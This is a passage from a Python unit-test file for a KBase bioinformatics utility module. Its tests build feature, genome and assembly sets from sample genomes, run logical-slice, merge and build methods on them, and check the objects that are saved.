output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(output_info[1], output_name)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['element_ordering']), num_sliced_features)\n pass\n\n #### test_KButil_Logical_Slice_Two_FeatureSets_03():\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Logical_Slice_Two_FeatureSets_03()\") # uncomment to skip\n def test_KButil_Logical_Slice_Two_FeatureSets_03(self):\n method = 'KButil_Logical_Slice_Two_FeatureSets_03'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n\n # featureSet 1\n featureSet_obj_1 = {'description': 'test featureSet 1',\n 'element_ordering': [\n feature_id_0,\n feature_id_1,\n feature_id_2\n ],\n 'elements': {\n feature_id_0: [genome_ref_0],\n feature_id_1: [genome_ref_1],\n feature_id_2: [genome_ref_2]\n }\n }\n provenance = [{}]\n featureSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': featureSet_obj_1,\n 'name': 'test_featureSet_1',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n\n featureSet_ref_1 = str(featureSet_info[WSID_I]) + '/' + str(\n featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n\n # featureSet 2\n featureSet_obj_2 = {'description': 'test featureSet 2',\n 'element_ordering': [\n feature_id_3,\n feature_id_1,\n feature_id_2\n ],\n 'elements': {\n feature_id_3: [genome_ref_3],\n feature_id_1: [genome_ref_1],\n feature_id_2: [genome_ref_2]\n }\n }\n provenance = [{}]\n featureSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': featureSet_obj_2,\n 'name': 'test_featureSet_2',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n\n featureSet_ref_2 = str(featureSet_info[WSID_I]) + '/' + str(\n featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n\n # run method\n num_sliced_features = 1 # noA_yesB\n logical_operator = 'noA_yesB'\n base_output_name = 'Slice_output_' + logical_operator\n params = {\n 'workspace_name': self.getWsName(),\n 'input_featureSet_ref_A': featureSet_ref_1,\n 'input_featureSet_ref_B': featureSet_ref_2,\n 'operator': logical_operator,\n 'output_name': base_output_name,\n 
'desc': 'test'\n }\n result = self.getImpl().KButil_Logical_Slice_Two_FeatureSets(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseCollections.FeatureSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(output_info[1], output_name)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['element_ordering']), num_sliced_features)\n pass\n\n #### test_KButil_Logical_Slice_Two_FeatureSets_NULL_RESULT():\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Logical_Slice_Two_FeatureSets_NULL_RESULT()\") # uncomment to skip\n def test_KButil_Logical_Slice_Two_FeatureSets_NULL_RESULT(self):\n method = 'KButil_Logical_Slice_Two_FeatureSets_NULL_RESULT'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n\n # featureSet 1\n featureSet_obj_1 = {'description': 'test featureSet 1',\n 'element_ordering': [\n feature_id_0,\n feature_id_1\n ],\n 'elements': {\n feature_id_0: [genome_ref_0],\n feature_id_1: [genome_ref_1]\n }\n }\n provenance = [{}]\n featureSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': featureSet_obj_1,\n 'name': 'test_featureSet_1',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n\n featureSet_ref_1 = str(featureSet_info[WSID_I]) + '/' + str(\n featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n\n # featureSet 2\n featureSet_obj_2 = {'description': 'test featureSet 2',\n 'element_ordering': [\n feature_id_2,\n feature_id_3\n ],\n 'elements': {\n feature_id_2: [genome_ref_2],\n feature_id_3: [genome_ref_3]\n }\n }\n provenance = [{}]\n featureSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': featureSet_obj_2,\n 'name': 'test_featureSet_2',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n\n featureSet_ref_2 = str(featureSet_info[WSID_I]) + '/' + str(\n featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n\n # run method\n num_sliced_features = 0 # yesA_yesB\n logical_operator = 'yesA_yesB'\n base_output_name = 'Slice_output_' + logical_operator + 'NULL_RESULT'\n 
params = {\n 'workspace_name': self.getWsName(),\n 'input_featureSet_ref_A': featureSet_ref_1,\n 'input_featureSet_ref_B': featureSet_ref_2,\n 'operator': logical_operator,\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Logical_Slice_Two_FeatureSets(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n # output_name = base_output_name\n # output_type = 'KBaseCollections.FeatureSet'\n # output_ref = self.getWsName()+'/'+output_name\n # info_list = self.getWsClient().get_object_info_new({'objects':[{'ref':output_ref}]})\n # self.assertEqual(len(info_list),1)\n # output_info = info_list[0]\n # self.assertEqual(output_info[1],output_name)\n # self.assertEqual(output_info[2].split('-')[0],output_type)\n # output_obj = self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n # self.assertEqual(len(output_obj['element_ordering']),num_sliced_features)\n pass\n\n \n #### test_KButil_Logical_Slice_Two_AssemblySets_01()\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Logical_Slice_Two_AssemblySets_01()\") # uncomment to skip\n def test_KButil_Logical_Slice_Two_AssemblySets_01(self):\n method = 'KButil_Logical_Slice_Two_AssemblySets_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # upload test data\n try:\n auClient = AssemblyUtil(self.callbackURL, token=self.token)\n except Exception as e:\n raise ValueError(\n 'Unable to instantiate auClient with callbackURL: ' + self.callbackURL + ' ERROR: ' + str(\n e))\n ass_file_1 = 'assembly_1.fa'\n ass_file_2 = 'assembly_2.fa'\n ass_path_1 = os.path.join(self.scratch, ass_file_1)\n ass_path_2 = os.path.join(self.scratch, ass_file_2)\n shutil.copy(os.path.join(\"data\", ass_file_1), ass_path_1)\n shutil.copy(os.path.join(\"data\", ass_file_2), ass_path_2)\n ass_ref_1 = auClient.save_assembly_from_fasta({\n 'file': {'path': ass_path_1},\n 'workspace_name': self.getWsName(),\n 'assembly_name': 'assembly_1'\n })\n ass_ref_2 = auClient.save_assembly_from_fasta({\n 'file': {'path': ass_path_2},\n 'workspace_name': self.getWsName(),\n 'assembly_name': 'assembly_2'\n })\n ass_ref_3 = auClient.save_assembly_from_fasta({\n 'file': {'path': ass_path_2},\n 'workspace_name': self.getWsName(),\n 'assembly_name': 'assembly_3'\n })\n\n # save assemblySets\n try:\n setAPI_Client = SetAPI (url=self.serviceWizardURL, token=self.ctx['token']) # for dynamic service\n except Exception as e:\n raise ValueError('ERROR: unable to instantiate SetAPI' + str(e))\n set_1_items = [{'ref':ass_ref_1, 'label': 'assembly 1'},\n {'ref':ass_ref_2, 'label': 'assembly 2'}]\n set_2_items = [{'ref':ass_ref_2, 'label': 'assembly 2'},\n {'ref':ass_ref_3, 'label': 'assembly 3'}]\n set_1_desc = 'test set'+'_1'\n set_2_desc = 'test set'+'_2'\n set_1_obj = { 'description': set_1_desc,\n 'items': set_1_items\n }\n set_2_obj = { 'description': set_2_desc,\n 'items': set_2_items\n }\n set_1_obj_name = 'set_1.AssemblySet'\n set_2_obj_name = 'set_2.AssemblySet'\n try:\n set_1_ref = setAPI_Client.save_assembly_set_v1 ({'workspace_name': self.getWsName(),\n 'output_object_name': set_1_obj_name,\n 'data': set_1_obj\n })['set_ref']\n set_2_ref = setAPI_Client.save_assembly_set_v1 ({'workspace_name': self.getWsName(),\n 'output_object_name': set_2_obj_name,\n 'data': set_2_obj\n })['set_ref']\n except Exception as e:\n raise ValueError('SetAPI FAILURE: Unable to save assembly set object to workspace: (' + self.getWsName()+\")\\n\" + str(e))\n 
\n # run method\n num_sliced_items = 1 # yesA_yesB\n #num_sliced_items = 1 # yesA_noB\n #num_sliced_items = 1 # noA_yesB\n logical_operator = 'yesA_yesB'\n #logical_operator = 'yesA_noB'\n #logical_operator = 'noA_yesB'\n base_output_name = 'logical_slice_assemblysets_output_' + logical_operator\n params = {\n 'workspace_name': self.getWsName(),\n 'input_assemblySet_ref_A': set_1_ref,\n 'input_assemblySet_ref_B': set_2_ref,\n 'operator': logical_operator,\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Logical_Slice_Two_AssemblySets(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseSets.AssemblySet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(output_info[1], output_name)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['items']), num_sliced_items)\n pass\n\n\n #### test_KButil_Logical_Slice_Two_GenomeSets_01()\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Logical_Slice_Two_GenomeSets_01()\") # uncomment to skip\n def test_KButil_Logical_Slice_Two_GenomeSets_01(self):\n method = 'KButil_Logical_Slice_Two_GenomeSets_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # upload test data\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n # feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n # feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n # feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n # feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n\n # GenomeSet 1\n genomeSet_obj_1 = {'description': 'test genomeSet 1',\n 'elements': {'genome_0a': {'ref': genome_ref_0},\n 'genome_1a': {'ref': genome_ref_1},\n 'genome_2a': {'ref': genome_ref_2},\n }\n }\n provenance = [{}]\n genomeSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseSearch.GenomeSet',\n 'data': genomeSet_obj_1,\n 'name': 'test_genomeSet_1',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n set_1_ref = str(genomeSet_info[WSID_I]) + '/' + str(\n genomeSet_info[OBJID_I]) + '/' + str(genomeSet_info[VERSION_I])\n\n # GenomeSet 2\n genomeSet_obj_2 = {'description': 'test genomeSet 2',\n 'elements': {'genome_1b': {'ref': genome_ref_1},\n 'genome_2b': {'ref': genome_ref_2},\n 'genome_3b': {'ref': genome_ref_3}\n }\n }\n provenance = [{}]\n genomeSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseSearch.GenomeSet',\n 'data': 
genomeSet_obj_2,\n 'name': 'test_genomeSet_2',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n set_2_ref = str(genomeSet_info[WSID_I]) + '/' + str(\n genomeSet_info[OBJID_I]) + '/' + str(genomeSet_info[VERSION_I])\n \n # run method\n num_sliced_elements = 2 # yesA_yesB\n logical_operator = 'yesA_yesB'\n base_output_name = 'logical_slice_genomesets_output_' + logical_operator\n params = {\n 'workspace_name': self.getWsName(),\n 'input_genomeSet_ref_A': set_1_ref,\n 'input_genomeSet_ref_B': set_2_ref,\n 'operator': logical_operator,\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Logical_Slice_Two_GenomeSets(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseSearch.GenomeSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(output_info[1], output_name)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(list(output_obj['elements'].keys())), num_sliced_elements)\n pass\n\n\n #### test_KButil_Merge_GenomeSets_01():\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Merge_GenomeSets_01()\") # uncomment to skip\n def test_KButil_Merge_GenomeSets_01(self):\n method = 'KButil_Merge_GenomeSets_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n # feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n # feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n # feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n # feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n num_merged_genomes = 4\n\n # GenomeSet 1\n genomeSet_obj_1 = {'description': 'test genomeSet 1',\n 'elements': {'genome_0': {'ref': genome_ref_0},\n 'genome_1': {'ref': genome_ref_1}\n }\n }\n provenance = [{}]\n genomeSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseSearch.GenomeSet',\n 'data': genomeSet_obj_1,\n 'name': 'test_genomeSet_1',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n\n genomeSet_ref_1 = str(genomeSet_info[WSID_I]) + '/' + str(\n genomeSet_info[OBJID_I]) + '/' + str(genomeSet_info[VERSION_I])\n\n # GenomeSet 2\n genomeSet_obj_2 = {'description': 'test genomeSet 2',\n 'elements': {'genome_2': {'ref': genome_ref_2},\n 'genome_3': {'ref': genome_ref_3}\n }\n }\n provenance = [{}]\n genomeSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseSearch.GenomeSet',\n 'data': 
genomeSet_obj_2,\n 'name': 'test_genomeSet_2',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n\n genomeSet_ref_2 = str(genomeSet_info[WSID_I]) + '/' + str(\n genomeSet_info[OBJID_I]) + '/' + str(genomeSet_info[VERSION_I])\n\n # run method\n base_output_name = method + '_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'input_refs': [genomeSet_ref_1, genomeSet_ref_2],\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Merge_GenomeSets(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseSearch.GenomeSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(output_info[1], output_name)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(list(output_obj['elements'].keys())), num_merged_genomes)\n pass\n\n #### test_KButil_Build_GenomeSet_01():\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Build_GenomeSet_01()\") # uncomment to skip\n def test_KButil_Build_GenomeSet_01(self):\n method = 'KButil_Build_GenomeSet_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n # feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n # feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n # feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n # feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n num_genomes = 4\n\n # run method\n base_output_name = method + '_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'input_refs': [genome_ref_0, genome_ref_1, genome_ref_2, genome_ref_3],\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Build_GenomeSet(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseSearch.GenomeSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(output_info[1], output_name)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(list(output_obj['elements'].keys())), num_genomes)\n pass\n\n #### test_KButil_Build_GenomeSet_from_FeatureSet_01():\n ##\n # HIDE @unittest.skip(\"skipped 
test_KButil_Build_GenomeSet_from_FeatureSet_01()\") # uncomment to skip\n def test_KButil_Build_GenomeSet_from_FeatureSet_01(self):\n method = 'KButil_Build_GenomeSet_from_FeatureSet_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n num_genomes = 4\n\n # featureSet\n featureSet_obj = {'description': 'test featureSet',\n 'element_ordering': [\n feature_id_0,\n feature_id_1,\n feature_id_2,\n feature_id_3\n ],\n 'elements': {\n feature_id_0: [genome_ref_0],\n feature_id_1: [genome_ref_1],\n feature_id_2: [genome_ref_2],\n feature_id_3: [genome_ref_3]\n }\n }\n provenance = [{}]\n featureSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': featureSet_obj,\n 'name': 'test_featureSet',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n featureSet_ref = str(featureSet_info[WSID_I]) + '/' + str(\n featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n\n # run method\n base_output_name = method + '_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'input_ref': featureSet_ref,\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Build_GenomeSet_from_FeatureSet(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseSearch.GenomeSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(output_info[1], output_name)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(list(output_obj['elements'].keys())), num_genomes)\n pass\n\n #### test_KButil_Add_Genomes_to_GenomeSet_01():\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Add_Genomes_to_GenomeSet_01()\") # uncomment to skip\n def test_KButil_Add_Genomes_to_GenomeSet_01(self):\n method = 'KButil_Add_Genomes_to_GenomeSet_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = 
self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n # feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n # feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n # feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n # feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n num_merged_genomes = 4\n\n # GenomeSet 1\n genomeSet_obj_1 = {'description': 'test genomeSet 1',\n 'elements': {'genome_1': {'ref': genome_ref_0}\n }\n }\n provenance = [{}]\n genomeSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseSearch.GenomeSet',\n 'data': genomeSet_obj_1,\n 'name': 'test_genomeSet_1',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n genomeSet_ref_1 = str(genomeSet_info[WSID_I]) + '/' + str(\n genomeSet_info[OBJID_I]) + '/' + str(genomeSet_info[VERSION_I])\n\n # run method\n base_output_name = method + '_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'input_genome_refs': [genome_ref_1, genome_ref_2, genome_ref_3],\n 'input_genomeset_ref': genomeSet_ref_1,\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Add_Genomes_to_GenomeSet(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseSearch.GenomeSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(output_info[1], output_name)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(list(output_obj['elements'].keys())), num_merged_genomes)\n pass\n\n #### test_KButil_Add_Genomes_to_GenomeSet_02():\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Add_Genomes_to_GenomeSet_02()\") # uncomment to skip\n def test_KButil_Add_Genomes_to_GenomeSet_02(self):\n method = 'KButil_Add_Genomes_to_GenomeSet_02'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + 